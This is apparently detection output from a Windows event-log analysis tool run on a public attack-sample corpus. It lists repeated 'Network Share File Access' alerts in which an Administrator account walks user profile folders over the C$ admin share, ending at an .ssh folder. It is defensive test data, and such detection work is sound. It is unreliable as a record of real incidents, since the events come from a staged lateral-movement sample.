10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved 
Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents 
: IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\Administrator.EXAMPLE\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\Administrator.EXAMPLE\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\.ssh : IP Address: 
